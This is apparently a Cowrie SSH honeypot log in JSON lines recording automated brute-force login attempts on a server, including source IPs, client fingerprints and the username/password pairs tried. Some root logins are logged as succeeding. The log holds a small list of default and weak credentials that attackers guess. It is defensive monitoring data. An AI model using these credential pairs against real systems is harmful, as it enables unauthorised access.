{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:58:16.587382Z","src_ip":"212.227.235.229","session":"45eff2941018"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:58:16.822568Z","src_ip":"212.227.235.229","session":"45eff2941018"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:58:17.339519Z","src_ip":"212.227.235.229","session":"279bd0fd8833"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T22:58:17.802765Z","src_ip":"212.227.235.229","session":"45eff2941018"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":57690,"dst_ip":"1.2.3.4","dst_port":22,"session":"4415b722fbfa","protocol":"ssh","message":"New connection: 217.72.205.35:57690 (1.2.3.4:22) [session: 4415b722fbfa]","sensor":"my-vps","timestamp":"2025-09-08T22:58:17.806997Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:58:17.807794Z","src_ip":"217.72.205.35","session":"4415b722fbfa"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:58:19.040086Z","src_ip":"212.227.235.229","session":"45eff2941018"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57336,"dst_ip":"1.2.3.4","dst_port":22,"session":"5a32d65aba3d","protocol":"ssh","message":"New connection: 212.227.235.229:57336 (1.2.3.4:22) [session: 5a32d65aba3d]","sensor":"my-vps","timestamp":"2025-09-08T22:58:19.276960Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:58:19.277984Z","src_ip":"212.227.235.229","session":"5a32d65aba3d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45682,"dst_ip":"1.2.3.4","dst_port":22,"session":"5e148bce4cbc","protocol":"ssh","message":"New connection: 212.227.235.229:45682 (1.2.3.4:22) [session: 5e148bce4cbc]","sensor":"my-vps","timestamp":"2025-09-08T22:58:19.304580Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:58:19.305342Z","src_ip":"212.227.235.229","session":"5e148bce4cbc"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:58:19.514228Z","src_ip":"212.227.235.229","session":"5a32d65aba3d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:58:19.553802Z","src_ip":"212.227.235.229","session":"5e148bce4cbc"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:58:20.494339Z","src_ip":"212.227.235.229","session":"5a32d65aba3d"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"Welcome1","message":"login attempt [postgres/Welcome1] failed","sensor":"my-vps","timestamp":"2025-09-08T22:58:20.579675Z","src_ip":"212.227.235.229","session":"5e148bce4cbc"}
{"eventid":"cowrie.session.closed","duration":"7.1","message":"Connection lost after 7.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:58:20.728963Z","src_ip":"212.227.235.229","session":"3ac6631a5f30"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:58:20.730724Z","src_ip":"212.227.235.229","session":"5a32d65aba3d"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:58:21.830740Z","src_ip":"212.227.235.229","session":"5e148bce4cbc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44666,"dst_ip":"1.2.3.4","dst_port":22,"session":"262ee5e7cf35","protocol":"ssh","message":"New connection: 212.227.235.229:44666 (1.2.3.4:22) [session: 262ee5e7cf35]","sensor":"my-vps","timestamp":"2025-09-08T22:58:28.034956Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:58:28.035701Z","src_ip":"212.227.235.229","session":"262ee5e7cf35"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:58:28.135926Z","src_ip":"212.227.235.229","session":"262ee5e7cf35"}
{"eventid":"cowrie.login.failed","username":"runner","password":"123456","message":"login attempt [runner/123456] failed","sensor":"my-vps","timestamp":"2025-09-08T22:58:28.580825Z","src_ip":"212.227.235.229","session":"262ee5e7cf35"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:58:29.684181Z","src_ip":"212.227.235.229","session":"262ee5e7cf35"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48286,"dst_ip":"1.2.3.4","dst_port":22,"session":"00405253fca1","protocol":"ssh","message":"New connection: 212.227.235.229:48286 (1.2.3.4:22) [session: 00405253fca1]","sensor":"my-vps","timestamp":"2025-09-08T22:58:55.511302Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:58:55.530952Z","src_ip":"212.227.235.229","session":"00405253fca1"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:58:55.768762Z","src_ip":"212.227.235.229","session":"00405253fca1"}
{"eventid":"cowrie.login.failed","username":"raspberry","password":"Welcome1","message":"login attempt [raspberry/Welcome1] failed","sensor":"my-vps","timestamp":"2025-09-08T22:58:56.800556Z","src_ip":"212.227.235.229","session":"00405253fca1"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:58:58.033971Z","src_ip":"212.227.235.229","session":"00405253fca1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51588,"dst_ip":"1.2.3.4","dst_port":22,"session":"a681d20c9b4f","protocol":"ssh","message":"New connection: 212.227.235.229:51588 (1.2.3.4:22) [session: a681d20c9b4f]","sensor":"my-vps","timestamp":"2025-09-08T22:58:59.122594Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:58:59.123418Z","src_ip":"212.227.235.229","session":"a681d20c9b4f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:58:59.434331Z","src_ip":"212.227.235.229","session":"a681d20c9b4f"}
{"eventid":"cowrie.login.failed","username":"weblogic","password":"changeme","message":"login attempt [weblogic/changeme] failed","sensor":"my-vps","timestamp":"2025-09-08T22:59:00.714654Z","src_ip":"212.227.235.229","session":"a681d20c9b4f"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:59:02.028006Z","src_ip":"212.227.235.229","session":"a681d20c9b4f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":35508,"dst_ip":"1.2.3.4","dst_port":22,"session":"0bb95cea4767","protocol":"ssh","message":"New connection: 212.227.125.160:35508 (1.2.3.4:22) [session: 0bb95cea4767]","sensor":"my-vps","timestamp":"2025-09-08T22:59:10.654850Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:59:10.658350Z","src_ip":"212.227.125.160","session":"0bb95cea4767"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40520,"dst_ip":"1.2.3.4","dst_port":22,"session":"6b958eaef6a5","protocol":"ssh","message":"New connection: 212.227.235.229:40520 (1.2.3.4:22) [session: 6b958eaef6a5]","sensor":"my-vps","timestamp":"2025-09-08T22:59:10.968271Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:59:10.969522Z","src_ip":"212.227.235.229","session":"6b958eaef6a5"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:59:11.299611Z","src_ip":"212.227.235.229","session":"6b958eaef6a5"}
{"eventid":"cowrie.client.kex","hassh":"19532158b559096b89b1a5f7d17175b2","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,arcfour128,arcfour,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","arcfour128","arcfour","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 19532158b559096b89b1a5f7d17175b2","sensor":"my-vps","timestamp":"2025-09-08T22:59:11.414862Z","src_ip":"212.227.125.160","session":"0bb95cea4767"}
{"eventid":"cowrie.login.success","username":"root","password":"bd123456","message":"login attempt [root/bd123456] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:59:11.546031Z","src_ip":"212.227.125.160","session":"0bb95cea4767"}
{"eventid":"cowrie.session.closed","duration":"1.0","message":"Connection lost after 1.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:59:11.616259Z","src_ip":"212.227.125.160","session":"0bb95cea4767"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":38872,"dst_ip":"1.2.3.4","dst_port":22,"session":"e40ca210806e","protocol":"ssh","message":"New connection: 212.227.125.160:38872 (1.2.3.4:22) [session: e40ca210806e]","sensor":"my-vps","timestamp":"2025-09-08T22:59:11.694026Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T22:59:11.694729Z","src_ip":"212.227.125.160","session":"e40ca210806e"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-09-08T22:59:11.737837Z","src_ip":"212.227.125.160","session":"e40ca210806e"}
{"eventid":"cowrie.login.success","username":"root","password":"bd123456","message":"login attempt [root/bd123456] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:59:11.869208Z","src_ip":"212.227.125.160","session":"e40ca210806e"}
{"eventid":"cowrie.login.failed","username":"db1inst1","password":"abc123","message":"login attempt [db1inst1/abc123] failed","sensor":"my-vps","timestamp":"2025-09-08T22:59:12.700604Z","src_ip":"212.227.235.229","session":"6b958eaef6a5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44200,"dst_ip":"1.2.3.4","dst_port":22,"session":"4db4a86aea24","protocol":"ssh","message":"New connection: 212.227.235.229:44200 (1.2.3.4:22) [session: 4db4a86aea24]","sensor":"my-vps","timestamp":"2025-09-08T22:59:12.738033Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:59:12.738920Z","src_ip":"212.227.235.229","session":"4db4a86aea24"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:59:12.839653Z","src_ip":"212.227.235.229","session":"4db4a86aea24"}
{"eventid":"cowrie.login.failed","username":"glassfish","password":"0","message":"login attempt [glassfish/0] failed","sensor":"my-vps","timestamp":"2025-09-08T22:59:13.279722Z","src_ip":"212.227.235.229","session":"4db4a86aea24"}
{"eventid":"cowrie.session.closed","duration":"3.1","message":"Connection lost after 3.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:59:14.031585Z","src_ip":"212.227.235.229","session":"6b958eaef6a5"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:59:14.380929Z","src_ip":"212.227.235.229","session":"4db4a86aea24"}
